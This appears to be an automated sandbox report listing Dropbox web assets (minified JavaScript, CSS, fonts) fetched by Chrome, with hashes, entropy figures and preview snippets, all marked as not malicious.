                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_video-file-vflMitggT.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="43bd2e45-ca07-38b9-81c2-b0e5f3a16495")}catch(e){}}();.define(["exports","react"],(function(e,l){"use strict";function t(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(l,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),l.default=e,Object.freeze(l)}var n=t(l);e.MultipleFoldersLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.5 7h4.386A2.25 2.25 0 0 1 8.9 8.245L9.276 9H18.5v9.25a2.25 2.25 0 0 1-2.25 2.25H4.75a2.25 2.25 0 0 1-2.25-2.25V7ZM4 8.5v9.75c0 .414.336.75.75.75h11.5a.75.75 0 0 0 .75-.75V10.5H8.349l-.792-1.585a.75.75 0 0 0-.67-.415H4Z",fill:"cu
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C source, ASCII text, with very long lines (1680)
                                                                        Category:downloaded
                                                                        Size (bytes):2000
                                                                        Entropy (8bit):5.348000083999637
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E0C2AE3F5B0D3EC3EF76C2DEC0EF2E14
                                                                        SHA1:92F5C0457B4799E4E6297178706EFE2555C9ADB6
                                                                        SHA-256:37DA183ADCCAA942EB12B5F57CD7060F8E56EF4D009F1509DD504FF68BD417CC
                                                                        SHA-512:C97C491C0CEEC123AEA0308986D9ECD7FA01F15B2A4373EEE5C006EF6D7019BE0113C69EF7C89CCFD205ED0F4F432A3707429AEFDE4D17FE14F6C5AA0C291E1F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/pithos/api_helper_validation.bundle-vfl4MKuP1.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="99c55f53-3ee1-3410-a9fd-2fd99e0d8575")}catch(e){}}();.(() => {const define = dbxPithosConfig._define, require = dbxPithosConfig._require; define((()=>(()=>{"use strict";var e={r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t);class n{constructor(e){this.dropboxOrigin=e}isDropboxDomain(e){const t=document.createElement("a");return t.href=e,t.hostname.endsWith(".dropbox.com")}handleEvent(e,t,n){"function"==typeof e&&e(t,n)}addQueryParameter(e,t){return 0!==t.indexOf("?")&&0!==t.indexOf("&")||(t=t.substring(1)),null===e&&(e=""),-1!==e.indexOf("?")?e+="&"+t:e+="?"+t,e}makeRequest(e,t,n,i,o,r,d,a,s){if(!e)return;e=this.dropboxOrigin+e,n||(n=6e4),i=i||functio
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1563)
                                                                        Category:downloaded
                                                                        Size (bytes):1564
                                                                        Entropy (8bit):4.765867310326991
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7B08E15668E6293DED274A0E43734BD4
                                                                        SHA1:84CC2086318F411FA109744A702B5B04271D7658
                                                                        SHA-256:6A8AD86F86D2671FDF62C01740FDC191743F39E124EE7401857E238144329881
                                                                        SHA-512:C5FE8390538C05BC59240D73C6813D7D16B63F1FDA3A1C4634FB987B26C9CCA160CF0AE3AB128F0C4CB02610FCC6F1653D4E3D23B2B565FEA28B9E3F95CED206
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/signup_signin/unified_susi-vflewjhVm.css
                                                                        Preview:.unified-susi-na .dwg-button2--button-style-transparent.link-na{color:var(--dwg-theme__color__attention__text);text-decoration-color:var(--dwg-theme__color__attention__border)}.unified-susi-na .dwg-button2--button-style-transparent.link-na:hover{text-decoration-color:var(--dwg-theme__color__attention__border--faint)}.link-na>.dwg-text{font-size:14px;line-height:17px}.sig-wrapper--dwg-refresh{position:absolute}.back-button-na .dwg-button2__icon{rotate:180deg;transform-origin:center var(--dwg-spacing__unit--1_5, 12px)}.back-button-na.dwg-button2--button-style-transparent{color:#000;text-decoration-color:var(--dwg-theme__color__attention__border)}.back-button-na:hover.dwg-button2--button-style-transparent{text-decoration-color:var(--dwg-theme__color__attention__border--faint)}.back-button-na.dwg-button2:hover>.dwg-button2__icon.dwg-button2__icon--right,.back-button-na.dwg-button2:focus-visible>.dwg-button2__icon.dwg-button2__icon--right,.js-focus-visible .back-button-na.dwg-button2.focus-
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (26864)
                                                                        Category:dropped
                                                                        Size (bytes):27323
                                                                        Entropy (8bit):5.3289401490781705
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1408BBA16FAB8048A3494E7E744A1AD7
                                                                        SHA1:F884FC3ABC30F00512863CA8760BD756B90E50B1
                                                                        SHA-256:0344D6A013413C9660D64F662B60836CD55FC92785F87AB9F4FC325BF28F4D84
                                                                        SHA-512:337002E394BEFA298D28806D9D81EFE883E8ACEF2521815B961BE0970665E242B46469F5B1CA1F96D8F29C0A5228ADBE6730B665751778A79AE79A918393D9C2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="43816d05-a281-3d75-95dd-4683ed835061")}catch(e){}}();./*! For license information please see alameda_bundle_chrome_en.js.LICENSE.txt */.(()=>{var __webpack_modules__={968:(__unused_webpack_module,exports)=>{(function(){var requirejs,require,define;(function(global,Promise,undef){if(!Promise)throw new Error("No Promise implementation available");var topReq,dataMain,src,subPath,bootstrapConfig=requirejs||require,hasOwn=Object.prototype.hasOwnProperty,contexts={},queue=[],currDirRegExp=/^\.\//,urlRegExp=/^\/|\:|\?|\.js$/,commentRegExp=/\/\*[\s\S]*?\*\/|([^:"'=]|^)\/\/.*$/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,slice=Array.prototype.slice;if("function"!=typeof requirejs){var asap=Promise.resolve(void 0);requirejs=topReq=newContext(
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (830)
                                                                        Category:downloaded
                                                                        Size (bytes):831
                                                                        Entropy (8bit):4.929291155076852
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D2C1CAEAF7D185B462A8D64FD0475932
                                                                        SHA1:C9E3EA63E9D3AC4FACC19BBB69A05D1A3076C51F
                                                                        SHA-256:005ED820758D4C12BEFDF1A3B2E9C30A0FA544038AF790FCC602AF1E3B63A4D1
                                                                        SHA-512:B479521B2AB44FF8DB425EE99E4E0A9894FCDDD85550000D657FEB4C30266B8DEBC52416FE2EF1CF497EBD6C1ECF886752C160AA0177C769A492E68560122CD8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/snackbar-vfl0sHK6v.css
                                                                        Preview:@keyframes alt-snackbarload{0%{bottom:-28px}100%{bottom:0}}.snackbar-layer{left:var(--maestro-left-nav-width, 240px);right:280px;padding:var(--spacing__base_unit)}@media only screen and (max-width: 1024px){.snackbar-layer{right:0}}@media only screen and (max-width: 735px){.snackbar-layer{left:0}}.snackbar-layer .snackbar-progress-bar{position:absolute;left:0;right:0;bottom:0}.snackbar-layer input{color:var(--color__inverse__standard__text)}.snackbar-layer-entire-page{width:100%}.snackbar-layer,.snackbar-layer-entire-page{position:fixed;display:flex;justify-content:center;bottom:0;pointer-events:none}.snackbar-layer *,.snackbar-layer-entire-page *{pointer-events:auto}.snackbar-layer>*,.snackbar-layer-entire-page>*{flex-grow:1}.snackbar-entire-page-container{margin:0 var(--spacing__base_unit) 0 var(--spacing__base_unit)}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):261263
                                                                        Entropy (8bit):5.557267936291212
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2E208516A3A49875A4BB05579D48CDC9
                                                                        SHA1:65E0B833F41E2FED42775E7B131B59263BD3663C
                                                                        SHA-256:F54165ECE6F2D77BC4ED4F9BCE6E064B918EB9092DFCA1E9F12392330A0584A9
                                                                        SHA-512:60649F38CB328A33943B064470DD9022FAE4F2ACDA1500DAC531EB3311A3DBDD5BA3D5459E25860B041D564836E60245C516D8DAF64293B8CDD66BE3DCA43B69
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:var arkoseLabsClientApia8a40d09;!function(){var t,e,n,r,o={7983:function(t,e){"use strict";e.N=void 0;var n=/^([^\w]*)(javascript|data|vbscript)/im,r=/&#(\w+)(^\w|;)?/g,o=/&tab;/gi,i=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,a=/^.+(:|&colon;)/gim,c=[".","/"];e.N=function(t){var e,u=(e=t||"",(e=e.replace(o,"&#9;")).replace(r,(function(t,e){return String.fromCharCode(e)}))).replace(i,"").trim();if(!u)return"about:blank";if(function(t){return c.indexOf(t[0])>-1}(u))return u;var s=u.match(a);if(!s)return u;var f=s[0];return n.test(f)?"about:blank":u}},5647:function(t,e){"use strict";function n(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function r(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function o(t,e,n){return e&&r(t.prototype,e),n&&r(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(t){return i=Object.setPr
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (11570)
                                                                        Category:dropped
                                                                        Size (bytes):94832
                                                                        Entropy (8bit):5.433360097675584
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A3B21B597C4EF46C3A62617988829C3D
                                                                        SHA1:E3905EB10989A4CE183C059A46D19AC93515D545
                                                                        SHA-256:DE89103A48608C558DDE5C896C89D11750AF977B0BCE83ACF8356036E056A3A4
                                                                        SHA-512:2A3C76BD70854C48B5340BEAB5A0D8DCBA0C10BC519373BDD48EE174897CCFC39120D8B4C81AB1CBEA86D1E83C8B88C1E1ED506D4C51351890FA98603A6F0EC7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("CacheStorage",["ErrorGuard","ExecutionEnvironment","WebStorage","cr:6943","cr:8958","emptyFunction","err","killswitch"],(function(a,b,c,d,e,f,g){var h,i,j,k="_@_",l="3b",m="CacheStorageVersion",n={length:0,getItem:a=c("emptyFunction"),setItem:a,clear:a,removeItem:a,key:a};d=function(){function a(a){this._store=a}var b=a.prototype;b.getStore=function(){return this._store};b.keys=function(){var a=[];for(var b=0;b<this._store.length;b++){var c=this._store.key(b);c!=null&&a.push(c)}return a};b.get=function(a){return this._store.getItem(a)};b.set=function(a,b){this._store.setItem(a,b)};b.remove=function(a){this._store.removeItem(a)};b.clear=function(){this._store.clear()};b.clearWithPrefix=function(a){a=a||"";var b=this.keys();for(var c=0;c<b.length;c++){var d=b[c];d!=null&&d.startsWith(a)&&this.remove(d)}};return a}();e=function(a){babelHelpers.inheritsLoose(b,a);function b(){var b;return a.call(this,(b=(h||(h=c("WebStorage"))).getLocalStorage())!=null?b:n)||this}b.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 80256, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):80256
                                                                        Entropy (8bit):7.997293870492385
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:9BE183D893FC4E9776E2AC5C30D05CA5
                                                                        SHA1:1C98D7DF402EEC10E05E276FDA9F097FC781FB79
                                                                        SHA-256:679054B9F305D91D3EB1DF88FA37A7490784E6E5AE6779A4335E7781504A5031
                                                                        SHA-512:AA7018E5397FBEE805D72C8A84AEA059634CCF01A9510B28DAECCB9A8A85457642DC08EB070D3478E73D51F387EB098B089A500709D954969A3DB310B22A96B4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-Semi-190618-Web.woff2
                                                                        Preview:wOF2......9...........9............................&..j.`..v.H..s.....D.....,..6.$..T. ..I..B..f[i....E.O?oa........IrV.1...;..ab..<zm..z_..l..t.v.4"=.%..!^%...........d.k.;.... ((X...4.....7..IL..@.K:. +a....n..M...x..V:.b...}....].Y..q#..r.q:...bvZ)....s.._.E....\..5.y.hm7.(....M..G.%I..75..(...Y^.k.."O.........1.7.zOjs.9.C..q...&.............../T...G&..^MR.;.1x..c.K..s.[..\{...RWe.q..G.V.fh#.x..J8@.......d.{.8uY.v.h....\Fie.>a..../.R.$..s.......... q..w;..o.b._.......*.%.....\JMr7...nR..JF.$Y}J".,....'.-.(.pi......\..zX...b....M.:..,..B.>..~..t....N%.u.Z..<.<.n`....3.3'.*EM..|...Y.C+|.'....Hm..U..u4..V._}...84r..A..U"...l...l>r..>..,kB2...&.1.rl.......[N....J...N..j..J....`!6Uy.........@l...$e`)7a.7a..y...s.Q!M.4.....t`..3.wg...YS.)..Wx_L.9!.?..z..."4)....U.z.:.+.C...K2.%.(...y..;L8w#^....=..j..T....J.-G.\y....P.c..XH......GDBb.j..H%dR...W..\=.....N.n]...Q.1a.E.v*.W.!..d+...oq....0.nI.H.T.. b..%Q&H..Q.z....cD..X..c."V.o.o.~.j...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):48
                                                                        Entropy (8bit):4.085500657991218
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:513F1D1684F5F5F96983E4AFDE6A12A9
                                                                        SHA1:9EE5B819E26671328A7B58526C7B5885EE053F1E
                                                                        SHA-256:BFC7DC4C0C556175F63B2D19A5BDB021D04A3160EEBFD0DAD90E4B3F019A6C5B
                                                                        SHA-512:493FCC0FC9704AB975C3576F2C8C2DD797E46CD6B8FC1CAC795D2BD3C8E9E879C67B9D5D9D4B790FB2061CC19EDDC6C36DDBDEE75DCAE46F3C18D48A53177A00
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnkgLBxhQ1aVhIFDcy-BCUSBQ0Vg6i3?alt=proto
                                                                        Preview:CiIKEw3MvgQlGgQICRgBGgQIVhgCIAEKCw0Vg6i3GgQISxgC
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 202596
                                                                        Category:dropped
                                                                        Size (bytes):57528
                                                                        Entropy (8bit):7.995418682223472
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:97191983CD221305C53F496800C17C1E
                                                                        SHA1:B91DC82CEB0519F675742B83E7CFE66E04A24B6B
                                                                        SHA-256:FC2B783B66C1C12E216845DB837496322A60F1C92508789A503B2E441C1789F7
                                                                        SHA-512:137CF68B9604CA42872BD6C4DE925EF212A0458D77056EF46C5E24D2DBDFA21A72E5A7F52335E56F3014F7425E4011E2752344B495C20B686A25DC5BA61CC714
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........iw.H. .._.5.p..i.x.h..e.*w..m...v{8BJ@e.Tk1.0s....2?....Ddj..<...K..322.........9...C.lx....o..P.......zQ0...$..?..q .....AS.)....,.(.. .m3.....".....K.v.....d.%..Z;;.hog.....v._....<z.....}..v.Z...:<<..1.............Vk......^.......:j........h- .=?.....h.u.]{.[.....zW7.o...r..oO.a}..._.....mQ.6..\.....>.......v}...i.u.Z6.b...n.u..0.>c....kQ..N)..R....N.pJ}..1..\.x.9..K.n@.......MRg>d..W..8F.&.9.YU......`..%+.S..$....$.IR.P.L..X.]..a..)L...:}2...m.n....k.......E.:..u.Qh.n...[..f2...<.CO{.f>...vUe...3.o./N....v<g.\..A..D.O..hQ7<.Mc..c......R..2...C...4...$.s.w..r..[7..../.R.m...'P.....A.S...s=......i...bp...{............:}.|....6.".p....0f.K.GM{l.u.p'.1...{..k...G....j...P.c....1.4....u..=..z..]..7i..Y.~..Y2.k..&............A4.L....w$..l......U.{Gm...q..n..s#.....K,.X.:A.6.W..p.\.Z.&.v.{.@{us.fGm...|1..bc.u........E..Gp.Y.B..S....~h..c..7..}e...Y.T.a&.}]."sZ7..Q...oa..S.>.n...O....>.R..g..l..9...>.u.~.....0.........
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), CFF, length 64584, version 1.3801
                                                                        Category:downloaded
                                                                        Size (bytes):64584
                                                                        Entropy (8bit):7.996835296394317
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:197F00BE92B49F2CCBA2E43105AF9F7D
                                                                        SHA1:14922675CC816A3C7538E7703E2D8A143A75C99E
                                                                        SHA-256:B6CEE80EB7532FF69B4038A549FE5B51FD10E55B025A2EB01B8D781B806FD88E
                                                                        SHA-512:C7A0EF16F2B4A01D9E1FE5D855FA2DBC970875134C203A58A1F1748CC468ECC4814BF69AAF4EB44DFB727C32AD717C85B260487BCA1E1DB5B266C0F27F11AD9A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/SourceCodePro-BoldIt-1058.otf.woff2
                                                                        Preview:wOF2OTTO...H....... .............................F...I.....H..>.`....6.$..p....:. [2....F.n..A..Wv..}z'E..'... (.o....5....4l..oCmf.......M..[...vwi@(.i."X..;/..!$....i..y/.m..y.$....F..)...I.F.mtt.w.@8..g._..mi.pd....5.J.d........5NZW..]~.......aEX.V....).....HHO.F.e#.pF..I...| 1}7..J)..<....q......7...+..X....!Bf=...4.e...HH....}g..0P...M..#..y+...^...|.......$...Z........B.3..1.c..-...:3.v.KD.j..{-.#..'..X|..$...k.&$...2W(..[xrUU(.;n3..f.......N....,2.....9Q?.3f.N...EaZ.......cJ).d..1...~%q.`.\X.b....p..b.....1.v50J7.WZ....PA..ye.d..E...q..U.....>..#...........l....fU..L....Ju...?NoJ'.SE...S........eP"Z.X.....7."KH.,+aE$%=].!b.p..d<.p..1#..1d...b.0!*r..!.9L...Q..g.Le"T.{~.._....zU...7.*ph.}0.x...33..........A....D,X`..........:.>.?...".Y=4:..=$kx(. .O.....tf...*:.....$%k[aD.g.u...L.3...[W..w$^.g ....-Y...v.s...[.)..7.......%..*..7.D&.....Mrz..u.{......x...y.@d.9...CyR.../....0...iCN.:)X...R"......6..Y...u....w..B...Xh..,C.'.q.....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (766)
                                                                        Category:dropped
                                                                        Size (bytes):1142
                                                                        Entropy (8bit):5.269642307818753
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:383498AE6EBC757CA244DB0BECDAB4A2
                                                                        SHA1:A3EBCA01B712F734333A7A34C0073ECD0DEEE1BF
                                                                        SHA-256:B79A27434E59D782580EB65A71667A7DFD8B0D62972599D48429245BD684C5F3
                                                                        SHA-512:67C5F7287F7FC71ACFD0CBFF057E3E73941871140E88B371D35ECA1E9DD7CFD1566DCDCEA2E29F3DE0511EECE7893D929C48BB31AFECF45E6EB6741118EB8013
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c3e3ec2b-4558-3a53-87c7-ae6cd642c8d1")}catch(e){}}();.define(["exports","./c_core_notify","./c_api_v2_routes_user_metadata_provider","./c_core_i18n","react-dom","react","./e_edison","./c_pap-events_sign_save_signature_doc","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_core_exception","./c_src_sink_index","metaserver/static/js/langpack"],(function(e,s,t,i,c,_,r,a,n,o,d,u,l,f,g){"use strict";e.ensureCookiesAreEnabled=function(){return!!t.Cookies.are_enabled()||(window===window.top&&s.require_css("/static/metaserver/static/css/notify-vfl4oJv2S.css").then((()=>{s.Notify.error(i.intl.formatMessage({id:"G39vbK",defaultMessage:"Unable to access strictly necessary cookies. The website might not func
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (304)
                                                                        Category:downloaded
                                                                        Size (bytes):305
                                                                        Entropy (8bit):4.931439734894977
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4E2CC091FAC48A36F2EB401FA6ECE06B
                                                                        SHA1:AC35B42D5B1FF5B592A44574459A1C6CE6DFBE44
                                                                        SHA-256:EA511EB41E9199AEC50864F7CD7862DEF7BE3AE5C232DBC066AC353EA56FEC8D
                                                                        SHA-512:B7E439B7D5A48FB1D52EC78BB0CC72622717F37CCB03AA988741D9757C8CC3AFBE7FE0ECDA12970916CDF484ED9280613E7E1777942CC64A517886516D8E3692
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.css
                                                                        Preview:.fingerprintjsComponent{z-index:1000;position:fixed;top:0;left:0;width:100%;height:100%;visibility:hidden}.fingerprintjsDiv{margin-left:auto;margin-right:auto;visibility:hidden}body #one-tap-fpjs-container~iframe[src='about:blank'][style*='visibility: hidden']{top:-100% !important;left:-100% !important}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (28861)
                                                                        Category:downloaded
                                                                        Size (bytes):29244
                                                                        Entropy (8bit):5.176909213597645
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B4C0C24FB4DF2B6099C72464FE00C215
                                                                        SHA1:951D6EFD3F3F143F082B973369CB9402BD1E159C
                                                                        SHA-256:1A85199E6656D85D9A32638EA2D9C4FB8BA6997E17C5AF31849E849FE020FC22
                                                                        SHA-512:746ACC14EE143A551CC77BEAFF9B6F132C30D1D673A5E26826916EF4A19225B130F0AB77A5B753C7F397FD3922D1470D7F01F451D888388DA95A01F250D65D06
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-content-icons_file_icon-vfltMDCT7.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="15cf9729-71ab-31f4-b24e-aa4ba9ddd3e8")}catch(e){}}();.define(["exports","react","./c_dig-content-icons_icons_file-unknown-large","./c_dig-content-icons_icons_file-video-small","./c_dig-content-icons_hooks_useContentIconViewbox","./c_dig-content-icons_icons_file-link-large"],(function(l,e,a,i,m,r){"use strict";function g(l){if(l&&l.__esModule)return l;var e=Object.create(null);return l&&Object.keys(l).forEach((function(a){if("default"!==a){var i=Object.getOwnPropertyDescriptor(l,a);Object.defineProperty(e,a,i.get?i:{enumerable:!0,get:function(){return l[a]}})}})),e.default=l,Object.freeze(e)}var o=g(e);const s=({className:l,hasWhitespace:e=!0,over:a="base",hasBackground:i=!0,...g})=>{const s=m.classNames(["dig-ContentIcon",l,"dig-ContentIcon--large",{"dig-ContentIcon--overBase":"
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3509)
                                                                        Category:downloaded
                                                                        Size (bytes):9382
                                                                        Entropy (8bit):4.873211498054136
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:320915DCA4FCC14B76A6609AF3445D98
                                                                        SHA1:F51A66AB752668770DE4D50BB87C323EDC1AF699
                                                                        SHA-256:A2EFE4341FFFAC8BD9F6450113FBAC5B5D96738DCD0AF410E16C8C7055E0B652
                                                                        SHA-512:C1865BA01E864A629DF06E33F958B0D52B8CF2D9FF0DA799768A5E929D1993F99ADD73425824604327966B9DE83731AAA505BD21FAA2EF6EAE324E745A13F216
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/typescript/component_libraries/dig-experimental/src/index.web-vflMgkV3K.css
                                                                        Preview:./* -- typescript/component_libraries/dig-experimental/src/accordion/index.web.css */..exp-dig-AccordionItem,.exp-dig-AccordionWrapper{display:flex;flex-direction:column}.exp-dig-AccordionHeader{align-items:center;border-top:1px solid var(--color__standard__border);cursor:pointer;display:flex}.exp-dig-AccordionHeader-spacing--standard{padding:var(--spacing__unit--1_5) var(--spacing__unit--2)}.exp-dig-AccordionHeader-spacing--small{padding:var(--spacing__base_unit)}.exp-dig-AccordionHeader-spacing--large{padding:var(--spacing__unit--3)}.exp-dig-AccordionHeader:focus{box-shadow:inset var(--boxshadow__focusring);outline:none}.exp-dig-AccordionHeader:focus:not([data-focus-visible-added]){box-shadow:none}.exp-dig-AccordionHeader-left-accessory{display:flex;flex-shrink:0;margin-right:var(--spacing__base_unit)}.exp-dig-AccordionHeader-title-container{display:flex;flex-direction:column;flex-grow:1}.exp-dig-AccordionHeader-chevron{color:var(--color__faint__text);display:flex}.exp-dig-AccordionH
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3482)
                                                                        Category:downloaded
                                                                        Size (bytes):3483
                                                                        Entropy (8bit):5.013030100013651
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:307B92102C1C5D4BAB05FFDB09A621F7
                                                                        SHA1:FA9D8945782691344FFFA9328B56D541504E1262
                                                                        SHA-256:6F4FC0817FB1A2199B277A69ED2022C6B0524DE34A2CBA7533536D40B6ABA410
                                                                        SHA-512:7D30703ECD866603DB82E2F0FC0D233D597F94652013A2B5589550952C75C0001C3573729A81E01C0D911AF8137F4A35C083DE552861C90A24150D469A918903
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig/fonts-vflMHuSEC.css
                                                                        Preview:@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflk7bxjs.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflyEJFZg.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflJ3txfq.ttf") format("truetype");font-weight:400;font-style:normal}@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vfl38XiTL.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vflyja8tN.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vflbI0jjP.ttf") format("truetype");font-weight:500;font-style:normal}@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrot
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (23711)
                                                                        Category:downloaded
                                                                        Size (bytes):28143
                                                                        Entropy (8bit):5.569164610447494
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:60EA22831E6EC2A5610BEA67D1ABB685
                                                                        SHA1:CAC136BE737C9F3000B3B33B1C30ABE6A2A97F7B
                                                                        SHA-256:DABFE1283315ACDD047EB83AD23E9637C16594A00D317815571EAD99C93D9FD9
                                                                        SHA-512:8CF79BF0A933B54DCCFF5A39B2F5D1F9AC5100092B41CA38A7DBCCA7E4C18C3BBE5DB0F51933A2BC2D25CAD9AF5B46FBE6BF0C5D5ABD15575038D59EED75DCAE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_auth_login_email_error_banner-vflYOoigx.js
